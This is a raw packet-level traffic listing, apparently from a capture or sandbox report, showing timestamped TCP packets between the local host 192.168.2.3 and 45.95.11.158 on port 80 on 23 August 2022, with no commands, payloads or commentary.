Aug 23, 2022 03:42:55.071290016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071300030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071307898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071340084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071379900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071398973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071415901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071445942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071472883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071484089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071491003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071522951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071535110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071563959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071578026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071594954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071615934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071635962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071639061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071677923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071691036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071717978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071721077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071746111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.071772099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.071793079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072102070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072145939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072185040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072195053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072212934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072233915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072247028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072262049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072391987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072434902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072455883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072474957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072500944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072503090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072525978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072559118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072565079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072606087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072623014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072645903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072654963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072671890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072696924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072719097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072731018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072772980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072781086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072813034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072820902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072840929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072865009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072885990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072899103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072940111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.072947025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.072979927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073010921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073046923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073055029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073060989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073204041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073246956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073260069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073286057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073297977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073313951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073331118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073359013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073415041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073456049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073461056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073496103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073501110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073523045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073539019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073561907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073566914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073601961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073605061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073642015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073645115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073672056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.073688984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.073715925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.074081898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.074124098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.074167013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.074168921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.074193954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.074218035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.074225903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.074255943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099329948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099421024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099462986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099489927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099500895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099534035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099539042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099611044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099652052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099669933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099694014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099704027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099723101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.099740028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.099766970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.101316929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.101375103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.101418018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.101445913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.101445913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.101484060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.101488113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.101499081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.105649948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105698109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105736017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105763912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105777979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.105802059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.105803967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105843067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105851889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.105884075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105890989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.105921984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.105933905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.105967999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106046915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106091976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106105089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106204033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106384039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106441975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106472015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106484890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106518030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106549978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106554985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106558084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106574059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106595993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106600046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106636047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106637001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106678009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106723070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106764078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106817007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106823921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106823921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106862068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106940985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.106951952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.106996059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107002020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107014894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107049942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107054949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107098103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107099056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107148886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107188940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107199907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107206106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107228041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107266903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107274055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107294083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107307911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107312918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107367039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107372999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107420921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107430935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107474089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107485056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107522011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107532024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107561111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107563019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107604027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107609034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107641935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107646942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107671022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107691050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107717037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107717037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107757092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107762098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107798100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107800961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107827902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107848883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107868910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107912064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107914925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107939959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107950926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107960939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.107980967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.107997894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108023882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108031034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108066082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108073950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108105898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108108997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108164072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108184099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108203888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108217955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108246088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108252048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108287096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108289003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108329058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108333111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108371019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108380079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108401060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108417034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108439922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108442068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108483076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108495951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108521938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108521938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108551979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108571053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108591080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108592987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108639002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108696938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108760118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.108769894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108800888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.108906984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131227016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131283998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131324053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131361961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131381035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131387949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131392956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131422997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131450891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131463051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131474972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131501913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131513119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131531954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131572008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131613016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131619930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131627083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131630898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131653070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131683111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.131702900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131711006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.131733894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133124113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133167982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133207083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133214951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133234024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133241892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133280993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133304119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133424997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133466005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133496046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133505106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133533001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.133547068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.133583069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.137506962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137557983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137597084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137625933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137666941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137685061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.137706041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137748003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137768984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137810946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.137810946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137855053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.137855053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137895107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137923002 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137927055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.137962103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.137967110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.137994051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138000011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138042927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138042927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138057947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138071060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138106108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138122082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138186932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138228893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138246059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138268948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138297081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138297081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138325930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138336897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138338089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138375998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138395071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138416052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138422012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138443947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138461113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138504982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138641119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138680935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138703108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138722897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.138727903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.138751984 CEST	80	49774	45.95.11.158	192.168.2.3
